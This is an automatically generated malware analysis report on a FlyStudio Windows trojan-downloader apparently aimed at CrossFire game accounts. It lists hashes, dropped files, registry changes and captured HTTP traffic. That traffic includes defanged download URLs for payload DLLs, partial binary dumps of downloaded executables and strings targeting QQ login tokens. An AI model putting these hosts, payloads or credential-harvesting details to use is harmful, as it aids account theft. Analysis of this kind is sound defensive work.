Trojan.Win32.FlyStudio_421221caff

by malwarelabrobot on February 21st, 2017 in Malware Descriptions.

Trojan-Downloader.Win32.AirJP.cw (Kaspersky), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan, Worm, EmailWorm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 421221caff7013a1e8284c20e10a880e
SHA1: b22eef49083508afbbf1e478cd7121d9720a8d57
SHA256: 37ec83a5c602301b4fb38d748234a700c5e316702abbce80e678e36fde43915d
SSDeep: 49152:1sONdLpgYI3v2KMln3/qeEftMg9qBu5Ea7c5Dg8GIHo4KxNsbLA2DifXtlSO4s:bzL/OvfMln3/qvdVo1pnIJNsbM2D2tz
Size: 4771840 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2017-02-05 16:22:06
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

TxService.exe:2924

The Trojan injects its code into the following process(es):

%original file name%.exe:1908

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process TxService.exe:2924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\sesvcs_963_56089.exe (503 bytes)
%Program Files%\23.txt (27530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KEZ8B515.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\01[1].txt (24010 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\NamuADLook[1].dll (16650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\26993501420171281319931[1].htm (45330 bytes)
C:\CF_Helper.dll (202 bytes)
%Program Files%\NamuADLook.dll (20518 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\33[1].txt (40 bytes)

The process %original file name%.exe:1908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\TxService.exe (1670 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\20D65GOU.txt (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\2672760322016102115848934[1].htm (97343 bytes)
C:\exdui.dll (53 bytes)

Registry activity

The process TxService.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\TxService_RASAPI32]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:1908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\WindowsPowerShell\v1.0]
"powershell.exe,-101" = "Windows PowerShell ISE"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"AccessibilityCpl.dll,-10" = "Ease of Access Center"
"gameux.dll,-10082" = "Games Explorer"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Common Files\Microsoft Shared\Ink]
"TipTsf.dll,-80" = "Tablet PC Input Panel"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10061" = "Spider Solitaire"
"pmcsnap.dll,-700" = "Print Management"
"wdc.dll,-10021" = "Performance Monitor"
"mblctr.exe,-1008" = "Windows Mobility Center"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"mycomput.dll,-300" = "Computer Management"
"FXSRESM.dll,-114" = "Windows Fax and Scan"
"msinfo32.exe,-100" = "System Information"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10060" = "Solitaire"
"ie4uinit.exe,-737" = "Internet Explorer (No Add-ons)"
"gameux.dll,-10055" = "FreeCell"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"MdSched.exe,-4001" = "Windows Memory Diagnostic"
"gameux.dll,-10059" = "Mahjong Titans"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"wucltux.dll,-1" = "Windows Update"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"dfrgui.exe,-103" = "Disk Defragmenter"
"filemgmt.dll,-2204" = "Services"
"gameux.dll,-10102" = "Internet Backgammon"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\migwiz]
"wet.dll,-588" = "Windows Easy Transfer"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"NetProjW.dll,-501" = "Connect to a Network Projector"

"rstrui.exe,-100" = "System Restore"
"SoundRecorder.exe,-100" = "Sound Recorder"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10209" = "More Games from Microsoft"
"wsecedit.dll,-718" = "Local Security Policy"
"gameux.dll,-10056" = "Hearts"
"gameux.dll,-10057" = "Minesweeper"
"gameux.dll,-10054" = "Chess Titans"
"comres.dll,-3410" = "Component Services"
"msra.exe,-100" = "Windows Remote Assistance"
"wdc.dll,-10030" = "Resource Monitor"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Common Files\Microsoft Shared\Ink]
"ShapeCollector.exe,-298" = "Personalize Handwriting Recognition"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Windows Journal]
"Journal.exe,-3074" = "Windows Journal"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\migwiz]
"wet.dll,-591" = "Windows Easy Transfer Reports"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\DVD Maker]
"DVDMaker.exe,-61403" = "Windows DVD Maker"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32\Speech\SpeechUX]
"sapi.cpl,-5555" = "Windows Speech Recognition"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"displayswitch.exe,-320" = "Connect to a Projector"
"odbcint.dll,-1310" = "Data Sources (ODBC)"
"gameux.dll,-10103" = "Internet Spades"
"iscsicpl.dll,-5001" = "iSCSI Initiator"
"sdcpl.dll,-101" = "Backup and Restore"
"msconfig.exe,-126" = "System Configuration"
"recdisc.exe,-2000" = "Create a System Repair Disc"
"SyncCenter.dll,-3000" = "Sync Center"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Windows Sidebar]
"sidebar.exe,-1005" = "Desktop Gadget Gallery"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10058" = "Purble Place"
"AuthFWGP.dll,-20" = "Windows Firewall with Advanced Security"
"miguiresource.dll,-101" = "Event Viewer"
"XpsRchVw.exe,-102" = "XPS Viewer"
"miguiresource.dll,-201" = "Task Scheduler"

[HKLM\SOFTWARE\Microsoft\Tracing\421221caff7013a1e8284c20e10a880e_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@C:\Windows\system32]
"gameux.dll,-10101" = "Internet Checkers"

[HKCU\Software\Classes\Local Settings\MuiCache\30\52C64B7E\@%Program Files%\Common Files\Microsoft Shared\Ink]
"mip.exe,-291" = "Math Input Panel"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
15a43a47885c3eff331e97137c08343d c:\CF_Helper.dll
5c7c865bafa4600bf1aca0e60ed8fa5a c:\Program Files\NamuADLook.dll
a9f7b23173ead00d6254ecd587e3537d c:\Program Files\sesvcs_963_56089.exe
ee904db75d49139181f892ac73859135 c:\TxService.exe
5c7c865bafa4600bf1aca0e60ed8fa5a c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\NamuADLook[1].dll
a9f7b23173ead00d6254ecd587e3537d c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\01[1].txt
c472335b008c5942ec8a162177058111 c:\exdui.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.0.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.0.0
File Description: CF????
Comments: www.cfzhushou.com
Language: Chinese (Simplified, PRC)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 2151338 2154496 4.31468 22a297cb33f8fd9ebf381594cd93efe0
.rdata 2158592 2443266 2445312 4.88414 d5393d00ca5041caceb3be286fbfd789
.data 4603904 442609 114688 3.80476 830b75ec0e3e250f1b99c182a9eee2a1
.rsrc 5050368 52436 53248 3.85261 77ffa92829d4ceb475ff862b04d401a0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/ 115.238.126.133
hxxp://blog.163.com/blog/static/26993501420171281319931/ 115.238.126.133
hxxp://cdct.zhdns.net/aload/as/33.txt
hxxp://xzdownad.zglhsw.com/adpub//01.txt 104.31.196.48
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll 104.31.196.48
hxxp://baike2016.blog.163.com/blog/static/26993501420171281319931/ 115.238.126.133
hxxp://down.9udn.com/aload/as/33.txt 122.228.207.207


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /leesin_2017/blog/static/2672760322016102115848934/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 20 Feb 2017 12:27:56 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=C943BEB723F67332CC62FAADA0872AD3.yqblog2-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hViq4Mw0u352A5GUAg==; expires=Tue, 20-Feb-18 12:27:56 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
b49..  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..  <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">..  <hea
d>..    <meta http-equiv="X-UA-Compatible" content="IE=7" />.
.    <meta http-equiv="content-type" content="text/html;charset=gbk
"/>..    <meta http-equiv="content-style-type" content="text/css
"/>..    <meta http-equiv="content-script-type" content="text/ja
vascript"/>..    <meta name="version" content="neblog-1.0"/>.
.    <script type="text/javascript">..      ..      ..      docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); ..      document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');..      window.focus();..      window.getMusicT
imeStamp=function(){return 'e77dd8d44dbf016978cef8c076feb15e';};..    
..      //BLOG-647:....OS..............................      (function
(){..        window.setTimeout(function(){..          var _loginUserIc
on = document.getElementById('loginUserIcon');..          var _rsavata
rimg = document.getElementById('rsavatarimg');..          if(!!_loginU
serIcon){..            var _loaded1 = false;..            var _img1 = 
new Image();..            _img1.onload = function(){..                
_loaded1 = true;..                _img1.onload = null;..            };
..            _img1.src = _loginUserIcon.src;..            window.setT
imeout(function(){..              if(!_loaded1){..                
<<< skipped >>>


GET /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache


HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 20 Feb 2017 12:34:09 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
hXXp://xzdownad.zglhsw.com/adpub//01.txtHTTP/1.0 200 OK..Content-Lengt
h: 40..Content-Type: text/plain..Last-Modified: Fri, 17 Feb 2017 05:52
:26 GMT..Accept-Ranges: bytes..ETag: "1ee814e288d21:1466"..Server: Mic
rosoft-IIS/6.0..X-Powered-By: ASP.NET..Date: Mon, 20 Feb 2017 12:34:09
 GMT..X-Cache: HIT from ctzjwzs2..Via: 1.0 ctzjwzs2 (squid)..Connectio
n: keep-alive..hXXp://xzdownad.zglhsw.com/adpub//01.txt..



HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.0 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:1466"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 20 Feb 2017 12:34:09 GMT
X-Cache: HIT from ctzjwzs2
Via: 1.0 ctzjwzs2 (squid)
Connection: keep-alive
HTTP/1.0 200 OK..Content-Length: 40..Content-Type: text/plain..Last-Mo
dified: Fri, 17 Feb 2017 05:52:26 GMT..Accept-Ranges: bytes..ETag: "1e
e814e288d21:1466"..Server: Microsoft-IIS/6.0..X-Powered-By: ASP.NET..D
ate: Mon, 20 Feb 2017 12:34:09 GMT..X-Cache: HIT from ctzjwzs2..Via: 1
.0 ctzjwzs2 (squid)..Connection: keep-alive..



HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:11 GMT
Content-Type: text/plain
Content-Length: 502080
Connection: keep-alive
Set-Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690; expires=Tue, 20-Feb-18 12:28:10 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Mon, 20 Feb 2017 10:13:26 GMT
Accept-Ranges: bytes
ETag: "b4eb72f9618bd21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f4f3c46f595a-VIE
....


GET /adpub//01.txt HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690


HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:11 GMT
Content-Type: text/plain
Content-Length: 502080
Connection: keep-alive
Last-Modified: Mon, 20 Feb 2017 10:13:26 GMT
Accept-Ranges: bytes
ETag: "b4eb72f9618bd21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f4fc71fd595a-VIE
MZ......................@...................................@...PE..L.
..oE]V......................... ...=...0...@....@.....................
............ZT....@.....................................X....@...x....
......@................................................>..H........
...................................UPX0..... .........................
.....UPX1.........0......................@....rsrc........@..;|.......
...........@..........................................................
.............................U..j.h..D.d..P.......0F.....3..E.VWP.E.d.
93...(...}.3.w.....iE...0...D.l.>@...... .....LW..E.....4....`...;.
ul.{..C.h..|.......e.\....r...P.....z.......%..f7.....E.....H.........
...J.......M.WhZ..QP..?..|..;.u/...Wy...R...W. C.f.Q..$'h. V.$...v.3..
........b..$.;...r&....iw...<..h.B.MZ5....L.....s....,E5P.'.o..O.9.
tk....$.I.P........@..u. .P3..m.....h..L.-....u.V.5.......Q.bT`..[..W.
P..I........P.B.......v(l...mY_^..3......".]...~.~..b.....i.........xj
?.U.j.R.\...`..Pt....8.y .'..>P.x..j.j.j...x.R...........v..h..f.hB
.h..v.....l!.e=..j....lzd...laVn...<L.[1.l....6...`AV.Ph.I;....j...
Q..(T.>.u.....J......j@......5..:..U.P.Q...U..R.\.QR....p;.......,.
...l_.cM... M.#t.j..xV...Ns.6.....\..Vs.z.u.xE...SD.._J^....F..[.[....
.SV.P.X....L...WY.h..V.@.D...#U,........;,.....0X..H/d.c.... Q.._.....
.....9d.!.'...* ..J...H.....KH...&....2.QQh...\..8:.R;........h...p..t
&PMUE.Q.px.D.Q<.p..k$P.W-Q.:..y3...s...?.;RE.....dh.m..~F..........
LV$.....[\..u...BB.\..m..7x`.....VYW..J2.....,.o^[t.r....Q.W.t:v..
<<< skipped >>>

HEAD /aload/cp/NamuADLook.dll HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690


HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:15 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f5130028595a-VIE
....


GET /aload/cp/NamuADLook.dll HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=d7d73ce9a2f1a31b8925f8187ea485f091487593690


HTTP/1.1 200 OK
Date: Mon, 20 Feb 2017 12:28:15 GMT
Content-Type: application/x-msdownload
Content-Length: 345088
Connection: keep-alive
Last-Modified: Sun, 22 Jan 2017 08:33:51 GMT
Accept-Ranges: bytes
ETag: "309aa5428a74d21:1466"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 3341f51531c8595a-VIE
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........}........
.....N|......NH.)....NI.......a.......q.........}.............a......N
M......Ny......Nx......N......Rich....................PE..L...on.X....
.......!.....$...........{.......@....................................
..9.....@.............................H............P..................
.....`..@0...D..................................@............@........
.......................text....".......$.................. ..`.rdata..
X....@.......(..............@..@.data...DE....... ..................@.
...rsrc........P......................@..@.reloc...B...`...D..........
........@..B..........................................................
......................................................................
......................................................................
......................................................................
............................................U..j.h.#..d.....PQV. ...3.
P.E.d......u..E......E...........P..............E.....V.E......#......
...M.d......Y^..]...............U....u.3.]....P...@..u.VWj.j. .PSj.h..
.....@....3..G...............Q. J.....D?.Pj.V.Ht........H...@..u.WV .P
Sj.h.......@...}.Vh.t............t.V..M....._.....^]................U.
.QW....u._..].SVW..$A..j.j.j.j...SWj.h......@B...E.@P.}I.........u.^[_
..]..E.j.j.PVSWj.h......@B....0....P..I...@..u..]. ...V.......V..L....
...3.9A.^[..._..].U..Q..V.7.A....;.tI.~..S.^.|4..;.u.......E......
<<< skipped >>>


GET /blog/static/26993501420171281319931/ HTTP/1.1
Accept: */*
Referer: hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: baike2016.blog.163.com
Cache-Control: no-cache
Cookie: usertrack=c 5 hViq4Mw0u352A5GUAg==


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 20 Feb 2017 12:28:02 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=85B5D9A5C526191EBDD8CCAEC2B1FA2D.yqblog18-8010; Domain=.blog.163.com; Path=/
b49..  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..  <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">..  <hea
d>..    <meta http-equiv="X-UA-Compatible" content="IE=7" />.
.    <meta http-equiv="content-type" content="text/html;charset=gbk
"/>..    <meta http-equiv="content-style-type" content="text/css
"/>..    <meta http-equiv="content-script-type" content="text/ja
vascript"/>..    <meta name="version" content="neblog-1.0"/>.
.    <script type="text/javascript">..      ..      ..      docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); ..      document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');..      window.focus();..      window.getMusicT
imeStamp=function(){return 'e77dd8d44dbf016978cef8c076feb15e';};..    
..      //BLOG-647:....OS..............................      (function
(){..        window.setTimeout(function(){..          var _loginUserIc
on = document.getElementById('loginUserIcon');..          var _rsavata
rimg = document.getElementById('rsavatarimg');..          if(!!_loginU
serIcon){..            var _loaded1 = false;..            var _img1 = 
new Image();..            _img1.onload = function(){..                
_loaded1 = true;..                _img1.onload = null;..            };
..            _img1.src = _loginUserIcon.src;..            window.setT
imeout(function(){..              if(!_loaded1){..                
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1908:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
Bv=kAv.SCv
gdiplus.dll
user32.dll
kernel32.dll
ntdll.dll
Kernel32.dll
GdiPlus.dll
wininet.dll
User32.dll
shell32.dll
ole32.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
gdi32.dll
Gdi32.dll
imm32.dll
atl.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
MsgWaitForMultipleObjects
GetProcessHeap
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
ShellExecuteA
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
?kernel32.dll
ptlogin2
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
skey=
hXXp://
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
-URL:
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
MsgBox
SysShadow.SubWnd
[VVV.111Ttt.com]
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
&appid=21000124&js_ver=10181&js_type=1&login_sig=kfVLgNRMRQUC6C0PRRA2ooX-A9w5NXfpsDsDwLOf48L779v*igTIF1BbikF4AjaV&u1=http://cf.qq.com/clan/&r=
hXXps://ssl.ptlogin2.qq.com/check?regmaster=&pt_tea=2&pt_vcode=1&uin=
function time(){return Math.random()}
hXXps://ssl.captcha.qq.com/cap_union_getsig_new?aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
